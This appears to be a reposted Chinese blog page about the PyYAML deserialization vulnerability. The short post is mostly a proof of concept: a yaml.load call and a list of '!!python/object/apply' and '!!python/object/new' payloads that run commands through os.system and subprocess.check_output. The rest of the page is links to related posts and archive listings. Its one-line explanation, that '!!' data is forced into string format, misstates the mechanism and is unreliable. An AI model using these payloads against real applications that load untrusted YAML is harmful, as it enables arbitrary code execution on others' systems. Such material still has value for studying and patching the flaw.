pyyaml反序列化漏洞

其他 2019-06-17 16:51:24 阅读次数: 0

pyyaml在解析含有！！开头的数据会强制进行类型转换成字符串格式。

测试

import yaml
yaml.load('!!python/object/apply:os.system ["date"]')

结果

poc还可以

!!python/object/apply:subprocess.check_output [[calc.exe]]
!!python/object/apply:subprocess.check_output ["calc.exe"]
!!python/object/apply:subprocess.check_output [["calc.exe"]]
!!python/object/apply:os.system ["calc.exe"]
!!python/object/new:subprocess.check_output [["calc.exe"]]
!!python/object/new:os.system ["calc.exe"]

参考：http://www.polaris-lab.com/index.php/archives/375/

猜你喜欢

转载自blog.csdn.net/qq1124794084/article/details/87270117

Python PyYAML反序列化漏洞

pyyaml反序列化漏洞

反序列化漏洞

PHP序列化和反序列化漏洞

weblogic 反序列化漏洞 getshell

java反序列化漏洞对策

php反序列化漏洞

PHP反序列化漏洞与Webshell

Weblogic 反序列化漏洞历史

Java反序列化漏洞分析

weblogic反序列化漏洞

nodejs & 反序列化漏洞 & 利用

Spring framework 反序列化的漏洞

JAVA反序列化漏洞

NodeJS反序列化漏洞利用

Java反序列化漏洞整理

php反序列化漏洞复现

Fastjson反序列化漏洞概述

fastjson反序列化RCE漏洞

Fastjson反序列化漏洞

PHP反序列化漏洞研究

浅谈python反序列化漏洞

浅谈php反序列化漏洞

反序列化漏洞-1

Java反序列化漏洞学习

typecho反序列化漏洞复现

Apache shiro反序列化漏洞

typecho反序列化漏洞

PHP反序列化漏洞总结

pikachu-反序列化漏洞

今日推荐

国产云输入法——仅华为无云端数据上传安全问题

开源日报 | 工业开源项目OGG 1.0；姐姐，你要和我一起配置火狐吗；苹果AI遥遥落后？Fedora 40

开放签电子签章：停止新增，优化体验，前进更进（五一假期前工作）

开源日报 | 中学生开源前端动画引擎；全球首个Llama3 8B中文版开源模型；联想电脑恐出局；Linus讽刺AI炒作

“百模大战”必有一战 | 2024中国“百模大战”竞争格局分析

最强开源大模型 Llama 3 上架 Gitee AI

周排行

自媒体文章如何提高原创度以及如何检测原创度

开启qq邮箱的smtp服务

Qt程序单次启动（QSingleApplication类）

国外的外包网站

更新IDEA主题——放飞代码风格

cocos2dx 实现搓牌效果（翻牌效果），包括铺平动画

dict和json之间的互相转换

angular的一些思考

. Fibonacci数列是这样定义的： F[0] = 0 F[1] = 1 for each i ≥ 2: F[i] = F[i-1] + F[i-2] 因此，Fibonacci数列就形如：0, 1

洛谷P1064 金明的预算方案

每日归档

2024-04-25(22)

2024-04-24(36)

2024-04-23(26)

2024-04-22(39)

2024-04-21(0)

2024-04-20(6)

2024-04-19(5)

2024-04-18(0)

2024-04-17(5)

2024-04-16(70)